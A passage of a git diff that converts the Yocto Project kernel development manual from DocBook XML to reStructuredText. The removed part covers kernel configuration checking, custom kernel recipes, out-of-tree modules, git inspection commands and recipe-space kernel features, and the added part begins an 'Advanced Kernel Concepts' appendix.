-                <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c kernel_configcheck -f
-                </literallayout>
-                Running this task produces warnings for when a
-                requested configuration does not appear in the final
-                <filename>.config</filename> file or when you override a
-                policy configuration in a hardware configuration fragment.
-            </para>
-
-            <para>
-                In order to run this task, you must have an existing
-                <filename>.config</filename> file.
-                See the
-                "<link linkend='using-menuconfig'>Using <filename>menuconfig</filename></link>"
-                section for information on how to create a configuration file.
-            </para>
-
-            <para>
-                Following is sample output from the
-                <filename>do_kernel_configcheck</filename> task:
-                <literallayout class='monospaced'>
-     Loading cache: 100% |########################################################| Time: 0:00:00
-     Loaded 1275 entries from dependency cache.
-     NOTE: Resolving any missing task queue dependencies
-
-     Build Configuration:
-         .
-         .
-         .
-
-     NOTE: Executing SetScene Tasks
-     NOTE: Executing RunQueue Tasks
-     WARNING: linux-yocto-4.12.12+gitAUTOINC+eda4d18ce4_16de014967-r0 do_kernel_configcheck:
-         [kernel config]: specified values did not make it into the kernel's final configuration:
-
-     ---------- CONFIG_X86_TSC -----------------
-     Config: CONFIG_X86_TSC
-     From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc-cpu.cfg
-     Requested value:  CONFIG_X86_TSC=y
-     Actual value:
-
-
-     ---------- CONFIG_X86_BIGSMP -----------------
-     Config: CONFIG_X86_BIGSMP
-     From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
-           /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
-     Requested value:  # CONFIG_X86_BIGSMP is not set
-     Actual value:
-
-
-     ---------- CONFIG_NR_CPUS -----------------
-     Config: CONFIG_NR_CPUS
-     From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
-           /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/bsp/common-pc/common-pc.cfg
-           /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
-     Requested value:  CONFIG_NR_CPUS=8
-     Actual value:     CONFIG_NR_CPUS=1
-
-
-     ---------- CONFIG_SCHED_SMT -----------------
-     Config: CONFIG_SCHED_SMT
-     From: /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/cfg/smp.cfg
-           /home/scottrif/poky/build/tmp/work-shared/qemux86/kernel-source/.kernel-meta/configs/standard/defconfig
-     Requested value:  CONFIG_SCHED_SMT=y
-     Actual value:
-
-
-
-     NOTE: Tasks Summary: Attempted 288 tasks of which 285 didn't need to be rerun and all succeeded.
-
-     Summary: There were 3 WARNING messages shown.
-                </literallayout>
-                <note>
-                    The previous output example has artificial line breaks
-                    to make it more readable.
-                </note>
-            </para>
-
-            <para>
-                The output describes the various problems that you can
-                encounter along with where to find the offending configuration
-                items.
-                You can use the information in the logs to adjust your
-                configuration files and then repeat the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configme'><filename>do_kernel_configme</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-kernel_configcheck'><filename>do_kernel_configcheck</filename></ulink>
-                tasks until they produce no warnings.
-            </para>
-
-            <para>
-                For more information on how to use the
-                <filename>menuconfig</filename> tool, see the
-                "<link linkend='using-menuconfig'>Using <filename>menuconfig</filename></link>"
-                section.
-            </para>
-        </section>
-
-        <section id='fine-tuning-the-kernel-configuration-file'>
-            <title>Fine-Tuning the Kernel Configuration File</title>
-
-            <para>
-                You can make sure the <filename>.config</filename> file is as
-                lean or efficient as possible by reading the output of the
-                kernel configuration fragment audit, noting any issues, making
-                changes to correct the issues, and then repeating.
-            </para>
-
-            <para>
-                As part of the kernel build process, the
-                <filename>do_kernel_configcheck</filename> task runs.
-                This task validates the kernel configuration by checking the
-                final <filename>.config</filename> file against the input
-                files.
-                During the check, the task produces warning messages for the
-                following issues:
-                <itemizedlist>
-                    <listitem><para>
-                        Requested options that did not make the final
-                        <filename>.config</filename> file.
-                        </para></listitem>
-                    <listitem><para>
-                        Configuration items that appear twice in the same
-                        configuration fragment.
-                        </para></listitem>
-                    <listitem><para>
-                        Configuration items tagged as "required" that were
-                        overridden.
-                        </para></listitem>
-                    <listitem><para>
-                        A board overrides a non-board specific option.
-                        </para></listitem>
-                    <listitem><para>
-                        Listed options not valid for the kernel being
-                        processed.
-                        In other words, the option does not appear anywhere.
-                        </para></listitem>
-                </itemizedlist>
-                <note>
-                    The <filename>do_kernel_configcheck</filename> task can
-                    also optionally report if an option is overridden during
-                    processing.
-                </note>
-            </para>
-
-            <para>
-                For each output warning, a message points to the file
-                that contains a list of the options and a pointer to the
-                configuration fragment that defines them.
-                Collectively, the files are the key to streamlining the
-                configuration.
-            </para>
-
-            <para>
-                To streamline the configuration, do the following:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Use a Working Configuration:</emphasis>
-                        Start with a full configuration that you
-                        know works.
-                        Be sure the configuration builds and boots
-                        successfully.
-                        Use this configuration file as your baseline.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Run Configure and Check Tasks:</emphasis>
-                        Separately run the
-                        <filename>do_kernel_configme</filename> and
-                        <filename>do_kernel_configcheck</filename> tasks:
-                        <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c kernel_configme -f
-     $ bitbake linux-yocto -c kernel_configcheck -f
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Process the Results:</emphasis>
-                        Take the resulting list of files from the
-                        <filename>do_kernel_configcheck</filename> task
-                        warnings and do the following:
-                        <itemizedlist>
-                            <listitem><para>
-                                Drop values that are redefined in the fragment
-                                but do not change the final
-                                <filename>.config</filename> file.
-                                </para></listitem>
-                            <listitem><para>
-                                Analyze and potentially drop values from the
-                                <filename>.config</filename> file that override
-                                required configurations.
-                                </para></listitem>
-                            <listitem><para>
-                                Analyze and potentially remove non-board
-                                specific options.
-                                </para></listitem>
-                            <listitem><para>
-                                Remove repeated and invalid options.
-                                </para></listitem>
-                        </itemizedlist>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Re-Run Configure and Check Tasks:</emphasis>
-                        After you have worked through the output of the kernel
-                        configuration audit, you can re-run the
-                        <filename>do_kernel_configme</filename> and
-                        <filename>do_kernel_configcheck</filename> tasks to
-                        see the results of your changes.
-                        If you have more issues, you can deal with them as
-                        described in the previous step.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                Iteratively working through steps two through four eventually
-                yields a minimal, streamlined configuration file.
-                Once you have the best <filename>.config</filename>, you can
-                build the Linux Yocto kernel.
-            </para>
-        </section>
-    </section>
-
-    <section id='expanding-variables'>
-        <title>Expanding Variables</title>
-
-        <para>
-            Sometimes it is helpful to determine what a variable expands
-            to during a build.
-            You can do examine the values of variables by examining the
-            output of the <filename>bitbake -e</filename> command.
-            The output is long and is more easily managed in a text file,
-            which allows for easy searches:
-            <literallayout class='monospaced'>
-     $ bitbake -e virtual/kernel > <replaceable>some_text_file</replaceable>
-            </literallayout>
-            Within the text file, you can see exactly how each variable is
-            expanded and used by the OpenEmbedded build system.
-        </para>
-    </section>
-
-    <section id='working-with-a-dirty-kernel-version-string'>
-        <title>Working with a "Dirty" Kernel Version String</title>
-
-        <para>
-            If you build a kernel image and the version string has a
-            "+" or a "-dirty" at the end, uncommitted modifications exist
-            in the kernel's source directory.
-            Follow these steps to clean up the version string:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Discover the Uncommitted Changes:</emphasis>
-                    Go to the kernel's locally cloned Git repository
-                    (source directory) and use the following Git command
-                    to list the files that have been changed, added, or
-                    removed:
-                    <literallayout class='monospaced'>
-     $ git status
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Commit the Changes:</emphasis>
-                    You should commit those changes to the kernel source
-                    tree regardless of whether or not you will save,
-                    export, or use the changes:
-                    <literallayout class='monospaced'>
-     $ git add
-     $ git commit -s -a -m "getting rid of -dirty"
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Rebuild the Kernel Image:</emphasis>
-                    Once you commit the changes, rebuild the kernel.</para>
-
-                    <para>Depending on your particular kernel development
-                    workflow, the commands you use to rebuild the
-                    kernel might differ.
-                    For information on building the kernel image when
-                    using <filename>devtool</filename>, see the
-                    "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-                    section.
-                    For information on building the kernel image when
-                    using Bitbake, see the
-                    "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-                    section.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='working-with-your-own-sources'>
-        <title>Working With Your Own Sources</title>
-
-        <para>
-            If you cannot work with one of the Linux kernel
-            versions supported by existing linux-yocto recipes, you can
-            still make use of the Yocto Project Linux kernel tooling by
-            working with your own sources.
-            When you use your own sources, you will not be able to
-            leverage the existing kernel
-            <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink> and
-            stabilization work of the linux-yocto sources.
-            However, you will be able to manage your own Metadata in the same
-            format as the linux-yocto sources.
-            Maintaining format compatibility facilitates converging with
-            linux-yocto on a future, mutually-supported kernel version.
-        </para>
-
-        <para>
-            To help you use your own sources, the Yocto Project provides a
-            linux-yocto custom recipe
-            (<filename>linux-yocto-custom.bb</filename>) that uses
-            <filename>kernel.org</filename> sources
-            and the Yocto Project Linux kernel tools for managing
-            kernel Metadata.
-            You can find this recipe in the
-            <filename>poky</filename> Git repository of the
-            Yocto Project <ulink url='&YOCTO_GIT_URL;'>Source Repository</ulink>
-            at:
-            <literallayout class="monospaced">
-     poky/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
-            </literallayout>
-        </para>
-
-        <para>
-            Here are some basic steps you can use to work with your own
-            sources:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Create a Copy of the Kernel Recipe:</emphasis>
-                    Copy the <filename>linux-yocto-custom.bb</filename>
-                    recipe to your layer and give it a meaningful name.
-                    The name should include the version of the Yocto Linux
-                    kernel you are using (e.g.
-                    <filename>linux-yocto-myproject_4.12.bb</filename>,
-                    where "4.12" is the base version of the Linux kernel
-                    with which you would be working).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create a Directory for Your Patches:</emphasis>
-                    In the same directory inside your layer, create a matching
-                    directory to store your patches and configuration files
-                    (e.g. <filename>linux-yocto-myproject</filename>).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Ensure You Have Configurations:</emphasis>
-                    Make sure you have either a <filename>defconfig</filename>
-                    file or configuration fragment files in your layer.
-                    When you use the <filename>linux-yocto-custom.bb</filename>
-                    recipe, you must specify a configuration.
-                    If you do not have a <filename>defconfig</filename> file,
-                    you can run the following:
-                    <literallayout class='monospaced'>
-     $ make defconfig
-                    </literallayout>
-                    After running the command, copy the resulting
-                    <filename>.config</filename> file to the
-                    <filename>files</filename> directory in your layer
-                    as "defconfig" and then add it to the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                    variable in the recipe.</para>
-
-                    <para>Running the <filename>make defconfig</filename>
-                    command results in the default configuration for your
-                    architecture as defined by your kernel.
-                    However, no guarantee exists that this configuration is
-                    valid for your use case, or that your board will even boot.
-                    This is particularly true for non-x86 architectures.</para>
-
-                    <para>To use non-x86 <filename>defconfig</filename> files,
-                    you need to be more specific and find one that matches your
-                    board (i.e. for arm, you look in
-                    <filename>arch/arm/configs</filename> and use the one that
-                    is the best starting point for your board).
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Edit the Recipe:</emphasis>
-                    Edit the following variables in your recipe as appropriate
-                    for your project:
-                    <itemizedlist>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>:
-                            The <filename>SRC_URI</filename> should specify
-                            a Git repository that uses one of the supported Git
-                            fetcher protocols (i.e. <filename>file</filename>,
-                            <filename>git</filename>, <filename>http</filename>,
-                            and so forth).
-                            The <filename>SRC_URI</filename> variable should
-                            also specify either a <filename>defconfig</filename>
-                            file or some configuration fragment files.
-                            The skeleton recipe provides an example
-                            <filename>SRC_URI</filename> as a syntax reference.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_VERSION'><filename>LINUX_VERSION</filename></ulink>:
-                            The Linux kernel version you are using (e.g.
-                            "4.12").
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_VERSION_EXTENSION'><filename>LINUX_VERSION_EXTENSION</filename></ulink>:
-                            The Linux kernel
-                            <filename>CONFIG_LOCALVERSION</filename> that is
-                            compiled into the resulting kernel and visible
-                            through the <filename>uname</filename> command.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>:
-                            The commit ID from which you want to build.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>:
-                            Treat this variable the same as you would in any
-                            other recipe.
-                            Increment the variable to indicate to the
-                            OpenEmbedded build system that the recipe has
-                            changed.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
-                            The default <filename>PV</filename> assignment is
-                            typically adequate.
-                            It combines the <filename>LINUX_VERSION</filename>
-                            with the Source Control Manager (SCM) revision
-                            as derived from the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>
-                            variable.
-                            The combined results are a string with the
-                            following form:
-                            <literallayout class='monospaced'>
-     3.19.11+git1+68a635bf8dfb64b02263c1ac80c948647cc76d5f_1+218bd8d2022b9852c60d32f0d770931e3cf343e2
-                            </literallayout>
-                            While lengthy, the extra verbosity in
-                            <filename>PV</filename> helps ensure you are using
-                            the exact sources from which you intend to build.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></ulink>:
-                            A list of the machines supported by your new recipe.
-                            This variable in the example recipe is set
-                            by default to a regular expression that matches
-                            only the empty string, "(^$)".
-                            This default setting triggers an explicit build
-                            failure.
-                            You must change it to match a list of the machines
-                            that your new recipe supports.
-                            For example, to support the
-                            <filename>qemux86</filename> and
-                            <filename>qemux86-64</filename> machines, use
-                            the following form:
-                            <literallayout class='monospaced'>
-     COMPATIBLE_MACHINE = "qemux86|qemux86-64"
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Customize Your Recipe as Needed:</emphasis>
-                    Provide further customizations to your recipe
-                    as needed just as you would customize an existing
-                    linux-yocto recipe.
-                    See the
-                    "<link linkend='modifying-an-existing-recipe'>Modifying an Existing Recipe</link>"
-                    section for information.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='working-with-out-of-tree-modules'>
-        <title>Working with Out-of-Tree Modules</title>
-
-        <para>
-            This section describes steps to build out-of-tree modules on
-            your target and describes how to incorporate out-of-tree modules
-            in the build.
-        </para>
-
-        <section id='building-out-of-tree-modules-on-the-target'>
-            <title>Building Out-of-Tree Modules on the Target</title>
-
-            <para>
-                While the traditional Yocto Project development model would be
-                to include kernel modules as part of the normal build
-                process, you might find it useful to build modules on the
-                target.
-                This could be the case if your target system is capable
-                and powerful enough to handle the necessary compilation.
-                Before deciding to build on your target, however, you should
-                consider the benefits of using a proper cross-development
-                environment from your build host.
-            </para>
-
-            <para>
-                If you want to be able to build out-of-tree modules on
-                the target, there are some steps you need to take
-                on the target that is running your SDK image.
-                Briefly, the <filename>kernel-dev</filename> package
-                is installed by default on all
-                <filename>*.sdk</filename> images and the
-                <filename>kernel-devsrc</filename> package is installed
-                on many of the <filename>*.sdk</filename> images.
-                However, you need to create some scripts prior to
-                attempting to build the out-of-tree modules on the target
-                that is running that image.
-            </para>
-
-            <para>
-                Prior to attempting to build the out-of-tree modules,
-                you need to be on the target as root and you need to
-                change to the <filename>/usr/src/kernel</filename> directory.
-                Next, <filename>make</filename> the scripts:
-                <literallayout class='monospaced'>
-     # cd /usr/src/kernel
-     # make scripts
-                </literallayout>
-                Because all SDK image recipes include
-                <filename>dev-pkgs</filename>, the
-                <filename>kernel-dev</filename> packages will be installed
-                as part of the SDK image and the
-                <filename>kernel-devsrc</filename> packages will be installed
-                as part of applicable SDK images.
-                The SDK uses the scripts when building out-of-tree
-                modules.
-                Once you have switched to that directory and created the
-                scripts, you should be able to build your out-of-tree modules
-                on the target.
-            </para>
-        </section>
-
-        <section id='incorporating-out-of-tree-modules'>
-            <title>Incorporating Out-of-Tree Modules</title>
-
-            <para>
-                While it is always preferable to work with sources integrated
-                into the Linux kernel sources, if you need an external kernel
-                module, the <filename>hello-mod.bb</filename> recipe is
-                available as a template from which you can create your
-                own out-of-tree Linux kernel module recipe.
-            </para>
-
-            <para>
-                This template recipe is located in the
-                <filename>poky</filename> Git repository of the
-                Yocto Project <ulink url='&YOCTO_GIT_URL;'>Source Repository</ulink>
-                at:
-                <literallayout class="monospaced">
-     poky/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
-                </literallayout>
-            </para>
-
-            <para>
-                To get started, copy this recipe to your layer and give it a
-                meaningful name (e.g. <filename>mymodule_1.0.bb</filename>).
-                In the same directory, create a new directory named
-                <filename>files</filename> where you can store any source files,
-                patches, or other files necessary for building
-                the module that do not come with the sources.
-                Finally, update the recipe as needed for the module.
-                Typically, you will need to set the following variables:
-                <itemizedlist>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-DESCRIPTION'><filename>DESCRIPTION</filename></ulink>
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE*</filename></ulink>
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Depending on the build system used by the module sources,
-                you might need to make some adjustments.
-                For example, a typical module <filename>Makefile</filename>
-                looks much like the one provided with the
-                <filename>hello-mod</filename> template:
-                <literallayout class='monospaced'>
-     obj-m := hello.o
-
-     SRC := $(shell pwd)
-
-     all:
-         $(MAKE) -C $(KERNEL_SRC) M=$(SRC)
-
-     modules_install:
-         $(MAKE) -C $(KERNEL_SRC) M=$(SRC) modules_install
-     ...
-                </literallayout>
-            </para>
-
-            <para>
-                The important point to note here is the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_SRC'><filename>KERNEL_SRC</filename></ulink>
-                variable.
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-module'><filename>module</filename></ulink>
-                class sets this variable and the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_PATH'><filename>KERNEL_PATH</filename></ulink>
-                variable to
-                <filename>${<ulink url='&YOCTO_DOCS_REF_URL;#var-STAGING_KERNEL_DIR'><filename>STAGING_KERNEL_DIR</filename></ulink>}</filename>
-                with the necessary Linux kernel build information to build
-                modules.
-                If your module <filename>Makefile</filename> uses a different
-                variable, you might want to override the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
-                step, or create a patch to
-                the <filename>Makefile</filename> to work with the more typical
-                <filename>KERNEL_SRC</filename> or
-                <filename>KERNEL_PATH</filename> variables.
-            </para>
-
-            <para>
-                After you have prepared your recipe, you will likely want to
-                include the module in your images.
-                To do this, see the documentation for the following variables in
-                the Yocto Project Reference Manual and set one of them
-                appropriately for your machine configuration file:
-                <itemizedlist>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RDEPENDS</filename></ulink>
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'><filename>MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</filename></ulink>
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RDEPENDS'><filename>MACHINE_EXTRA_RDEPENDS</filename></ulink>
-                        </para></listitem>
-                    <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RRECOMMENDS'><filename>MACHINE_EXTRA_RRECOMMENDS</filename></ulink>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Modules are often not required for boot and can be excluded from
-                certain build configurations.
-                The following allows for the most flexibility:
-                <literallayout class='monospaced'>
-     MACHINE_EXTRA_RRECOMMENDS += "kernel-module-mymodule"
-                </literallayout>
-                The value is derived by appending the module filename without
-                the <filename>.ko</filename> extension to the string
-                "kernel-module-".
-            </para>
-
-            <para>
-                Because the variable is
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>
-                and not a
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
-                variable, the build will not fail if this module is not
-                available to include in the image.
-            </para>
-        </section>
-    </section>
-
-
-    <section id='inspecting-changes-and-commits'>
-        <title>Inspecting Changes and Commits</title>
-
-        <para>
-            A common question when working with a kernel is:
-            "What changes have been applied to this tree?"
-            Rather than using "grep" across directories to see what has
-            changed, you can use Git to inspect or search the kernel tree.
-            Using Git is an efficient way to see what has changed in the tree.
-        </para>
-
-        <section id='what-changed-in-a-kernel'>
-            <title>What Changed in a Kernel?</title>
-
-            <para>
-                Following are a few examples that show how to use Git
-                commands to examine changes.
-                These examples are by no means the only way to see changes.
-                <note>
-                    In the following examples, unless you provide a commit
-                    range, <filename>kernel.org</filename> history is blended
-                    with Yocto Project kernel changes.
-                    You can form ranges by using branch names from the
-                    kernel tree as the upper and lower commit markers with
-                    the Git commands.
-                    You can see the branch names through the web interface
-                    to the Yocto Project source repositories at
-                    <ulink url='&YOCTO_GIT_URL;'></ulink>.
-                </note>
-                To see a full range of the changes, use the
-                <filename>git whatchanged</filename> command and specify a
-                commit range for the branch
-                (<replaceable>commit</replaceable><filename>..</filename><replaceable>commit</replaceable>).
-            </para>
-
-            <para>
-                Here is an example that looks at what has changed in the
-                <filename>emenlow</filename> branch of the
-                <filename>linux-yocto-3.19</filename> kernel.
-                The lower commit range is the commit associated with the
-                <filename>standard/base</filename> branch, while
-                the upper commit range is the commit associated with the
-                <filename>standard/emenlow</filename> branch.
-                <literallayout class='monospaced'>
-     $ git whatchanged origin/standard/base..origin/standard/emenlow
-                </literallayout>
-            </para>
-
-            <para>
-                To see short, one line summaries of changes use the
-                <filename>git log</filename> command:
-                <literallayout class='monospaced'>
-     $ git log --oneline origin/standard/base..origin/standard/emenlow
-                </literallayout>
-            </para>
-
-            <para>
-                Use this command to see code differences for the changes:
-                <literallayout class='monospaced'>
-     $ git diff origin/standard/base..origin/standard/emenlow
-                </literallayout>
-            </para>
-
-            <para>
-                Use this command to see the commit log messages and the
-                text differences:
-                <literallayout class='monospaced'>
-     $ git show origin/standard/base..origin/standard/emenlow
-                </literallayout>
-            </para>
-
-            <para>
-                Use this command to create individual patches for
-                each change.
-                Here is an example that that creates patch files for each
-                commit and places them in your <filename>Documents</filename>
-                directory:
-                <literallayout class='monospaced'>
-     $ git format-patch -o $HOME/Documents origin/standard/base..origin/standard/emenlow
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='showing-a-particular-feature-or-branch-change'>
-            <title>Showing a Particular Feature or Branch Change</title>
-
-            <para>
-                Tags in the Yocto Project kernel tree divide changes for
-                significant features or branches.
-                The <filename>git show</filename>&nbsp;<replaceable>tag</replaceable>
-                command shows changes based on a tag.
-                Here is an example that shows <filename>systemtap</filename>
-                changes:
-                <literallayout class='monospaced'>
-     $ git show systemtap
-                </literallayout>
-                You can use the
-                <filename>git branch --contains</filename>&nbsp;<replaceable>tag</replaceable>
-                command to show the branches that contain a particular feature.
-                This command shows the branches that contain the
-                <filename>systemtap</filename> feature:
-                <literallayout class='monospaced'>
-     $ git branch --contains systemtap
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='adding-recipe-space-kernel-features'>
-        <title>Adding Recipe-Space Kernel Features</title>
-
-        <para>
-            You can add kernel features in the
-            <link linkend='recipe-space-metadata'>recipe-space</link> by
-            using the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
-            variable and by specifying the feature's <filename>.scc</filename>
-            file path in the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-            statement.
-            When you add features using this method, the OpenEmbedded build
-            system checks to be sure the features are present.
-            If the features are not present, the build stops.
-            Kernel features are the last elements processed for configuring
-            and patching the kernel.
-            Therefore, adding features in this manner is a way
-            to enforce specific features are present and enabled
-            without needing to do a full audit of any other layer's additions
-            to the <filename>SRC_URI</filename> statement.
-        </para>
-
-        <para>
-            You add a kernel feature by providing the feature as part of the
-            <filename>KERNEL_FEATURES</filename> variable and by providing the
-            path to the feature's <filename>.scc</filename> file, which is
-            relative to the root of the kernel Metadata.
-            The OpenEmbedded build system searches all forms of kernel
-            Metadata on the <filename>SRC_URI</filename> statement regardless
-            of whether the Metadata is in the "kernel-cache", system kernel
-            Metadata, or a recipe-space Metadata (i.e. part of the kernel
-            recipe).
-            See the
-            "<link linkend='kernel-metadata-location'>Kernel Metadata Location</link>"
-            section for additional information.
-        </para>
-
-        <para>
-            When you specify the feature's <filename>.scc</filename> file
-            on the <filename>SRC_URI</filename> statement, the OpenEmbedded
-            build system adds the directory of that
-            <filename>.scc</filename> file along with all its subdirectories
-            to the kernel feature search path.
-            Because subdirectories are searched, you can reference a single
-            <filename>.scc</filename> file in the
-            <filename>SRC_URI</filename> statement to reference multiple kernel
-            features.
-        </para>
-
-        <para>
-            Consider the following example that adds the "test.scc" feature
-            to the build.
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Create the Feature File:</emphasis>
-                    Create a <filename>.scc</filename> file and locate it
-                    just as you would any other patch file,
-                    <filename>.cfg</filename> file, or fetcher item
-                    you specify in the <filename>SRC_URI</filename>
-                    statement.
-                    <note><title>Notes</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                You must add the directory of the
-                                <filename>.scc</filename> file to the fetcher's
-                                search path in the same manner as you would
-                                add a <filename>.patch</filename> file.
-                                </para></listitem>
-                            <listitem><para>
-                                You can create additional
-                                <filename>.scc</filename> files beneath the
-                                directory that contains the file you are
-                                adding.
-                                All subdirectories are searched during the
-                                build as potential feature directories.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                    Continuing with the example, suppose the "test.scc"
-                    feature you are adding has a
-                    <filename>test.scc</filename> file in the following
-                    directory:
-                    <literallayout class='monospaced'>
-     <replaceable>my_recipe</replaceable>
-        |
-        +-linux-yocto
-           |
-           +-test.cfg
-           +-test.scc
-                    </literallayout>
-                    In this example, the <filename>linux-yocto</filename>
-                    directory has both the feature
-                    <filename>test.scc</filename> file and a similarly
-                    named configuration fragment file
-                    <filename>test.cfg</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Add the Feature File to <filename>SRC_URI</filename>:</emphasis>
-                    Add the <filename>.scc</filename> file to the
-                    recipe's <filename>SRC_URI</filename> statement:
-                    <literallayout class='monospaced'>
-     SRC_URI_append = " file://test.scc"
-                    </literallayout>
-                    The leading space before the path is important as the
-                    path is appended to the existing path.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Specify the Feature as a Kernel Feature:</emphasis>
-                    Use the <filename>KERNEL_FEATURES</filename> statement
-                    to specify the feature as a kernel feature:
-                    <literallayout class='monospaced'>
-     KERNEL_FEATURES_append = " test.scc"
-                    </literallayout>
-                    The OpenEmbedded build system processes the kernel feature
-                    when it builds the kernel.
-                    <note>
-                        If other features are contained below "test.scc",
-                        then their directories are relative to the directory
-                        containing the <filename>test.scc</filename> file.
-                    </note>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/kernel-dev/kernel-dev-concepts-appx.rst b/documentation/kernel-dev/kernel-dev-concepts-appx.rst
new file mode 100644
index 0000000000..681faee522
--- /dev/null
+++ b/documentation/kernel-dev/kernel-dev-concepts-appx.rst
@@ -0,0 +1,425 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************************
+Advanced Kernel Concepts
+************************
+
+.. _kernel-big-picture:
+
+Yocto Project Kernel Development and Maintenance
+================================================
+
+Kernels available through the Yocto Project (Yocto Linux kernels), like
+other kernels, are based off the Linux kernel releases from
+https://www.kernel.org. At the beginning of a major Linux kernel
+development cycle, the Yocto Project team chooses a Linux kernel based
+on factors such as release timing, the anticipated release timing of
+final upstream ``kernel.org`` versions, and Yocto Project feature
+requirements. Typically, the Linux kernel chosen is in the final stages
